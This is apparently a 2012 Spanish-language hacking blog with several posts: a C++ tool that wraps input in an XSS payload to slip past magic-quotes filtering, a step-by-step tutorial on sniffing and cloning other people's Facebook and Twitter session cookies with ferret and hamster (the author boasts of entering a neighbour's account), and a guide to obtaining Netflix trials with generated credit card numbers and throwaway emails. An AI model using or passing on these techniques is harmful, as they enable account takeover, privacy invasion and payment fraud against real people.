13 jun. 2012

Bypass MagicQuotes

Aqui una pequeña herramienta codeada por mi para bypassear el filtro magicquotes 
#include <iostream>
#include <stdio.h>
#include <conio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <windows.h>
#include <mmsystem.h>


using namespace std;

void dow(char *word)
{
    int i = 0, asc, tam = strlen(word);
    do
    {
        asc = (int)word[i];
        i++;
        cout<<asc;
        if(i<tam)
            cout<<',';
    }
    while(i<tam);
}

int main()
{
    char op, word[30];
    system ("title Bypassing MagicQuotes Filters");
    do
    {
        system("cls");
        cout<<" ____ ___ ____ ____ _  _ ___  ____ ____ _  _"<<endl;
        cout<<" ====  |  [__] |--< |\\/| |__> |--| |--< |-:_"<<endl;
        cout<<"          Bypass Magic Quotes T00l\n";
        cout<<"[+]Usage: escribe y da enter xD"<<endl;
        cout<<"_________________________________"<<endl;
        cout<<"\nIntroduce la cadena:"<<endl;
        cout<<"->";
        cin>>word;
        cout<<"\nXSS:"<<endl;
        cout<<"<script>alert(String.fromCharCode(";
        dow(word);
        cout<<"));</script>"<<endl;
        cout<<"\nAgain? s/n"<<endl;
        cout<<"->";
        cin>>op;
        op=tolower(op);
    }
    while(op=='s');
    if (op != 's')
        MessageBox(NULL,TEXT("Coded by StØrMd[4]rk \n\t\nstormdark-nxt@live.jp \n "),TEXT("About"),MB_OK | MB_ICONEXCLAMATION );

    return 0;
}






Code in Github: https://github.com/stormdark/BypassMagicQuotes/blob/master/bypass.cpp











By





a las















Etiquetas:
,
















          

        

          

        

11 jun. 2012


          

        







Clonando sesiones de facebook [Session Hijacking]












En este tutorial explicare una manera fácil de clonar sesiones de diferentes redes sociales tales como Twitter, Facebook o lo que caiga estando dentro de una red (ajena xD).

Soft que utilizaremos:



[1] hámster

[2] ferret               http://www.erratasec.com/sidejacking.zip

[3]Cain & Abel     http://www.oxid.it/cain.html

[4] Firefox             http://www.mozilla.com/

[4] Una maquina con Windows



Una ves que tengamos el soft listo en nuestro pc extraemos el contenido de "sidejacking.zip" y lo movemos a C:\ para su fácil acceso.

Antes que nada tenemos que hacer un MITM…pero asumiré que ya saben envenenar la red, asi que me salto esta parte.(Para esto es Cain ehh!)  //candado anti lamm0s para este tuto jejeje



Seguido de esto abrimos una shell y ejecutamos Ferret –W para ver las interfaces que tenemos en nuestro pc:













Yo utilizare mi AlfaNetworks que es la numero 2, entonces escribo:





ferret –i 2



Empezara a sniffear la red y generara un archivo hámster.txt que es donde se van volcando las cookies que va capturando…

Lo siguiente será abrir otra Shell y ejecutar hámster (este no tiene parametros)



hamster











hámster es un proxy y su función es que solo acomoda por medio de links toda la información que hay en hámster.txt (el archivo que genera ferret) y hace mas fácil el acceso a estas.

Lo siguiente será abrir Firefox y configurar un proxy, para esto consulten el archivo de ayuda de hámster ya que el puerto varia a la versión de hámster que tengan, en mi caso tengo que usar el puerto 3128, entonces la configuración quedaría asi:









Una vez hecho esto, solo escribimos en la barra de direcciones http://hamster/ y nos mostrara las cookies volcadas por ferret en hámster.txt de la siguiente manera:









Ahi veremos las cookies que hemos robado y solo resta abrir en otra pestaña el link de assbook, twitter, Hi-5, o de la red social que tengamos las cookies. Yo lo que hago es buscar assbook en google y directamente entrare a la cuenta de mi vecina jejej











Esto es todo, no puse una captura del face de mi vecina porque pueden ir de chismosos jeje =B



Aqui les dejo un video para que vean como funciona   (veanlo en HD)

























By





a las















Etiquetas:
















          

        

          

        

10 jun. 2012


          

        







Netflix Gratis














Bueno de seguro ésto ya lo sabra la mayoria pero para los que aun no saben que onda con el mes gratis de netflix aqui les traigo la forma para saltarse su disque seguridad 







Lo unico que tienen que hacer es conseguir de donde sea un numero de tarjeta de credito, en mi caso utilice un generador lo pueden bajar de aqui, tambien hay paginas que generan numeros de tarjetas de credito validas por supuesto











Vamos a la pagina de registro de Netflix y nos pediran varios datos, en donde nos pide el numero de tarjeta insertaremos el numero que nos genera el generador de cc's y donde pide el codigo de seguridad ponemos los ultimos 3 numeros de la tarjeta y los demas datos los inventamos













y eso es todo =3 jejeje































Y bueno eso es para tener un mes gratis pero si nos gusta el servicio podemos hacerle asi cada mes con diferentes cuentas de correo electronico, por ejemplo hay paginas que nos ofrecen correos electronicos temporales como por ejemplo http://10minutemail.com y podemos utilizarlos para que sea mas rapido todo este proceso de registro, yo en este caso caso solo utilice mi cuenta de facebook porque tenia gueva de abrir mi correo xD











StOrMd[4]rk









By





a las















Etiquetas:
















          

        

          

        

8 jun. 2012


          

        







Hello Fuckin' World










Primer post y haber que sale..



En este blog estare compartiendo alguna info de hack, musica, salvar al planeta, stuff, etc...



Algunos ya me llegan a reconocer en el under pero para los que no, me presento..

Codename: stormdark

Pais: MX

Edad: 20 y contando...

Intereses: Hack, Crack, Phreak, Cyberpunk, 0Days, Music..









Fuck the system!



















keep hacking..

=3








By





a las






























        

      









Suscribirse a:
Entradas (Atom)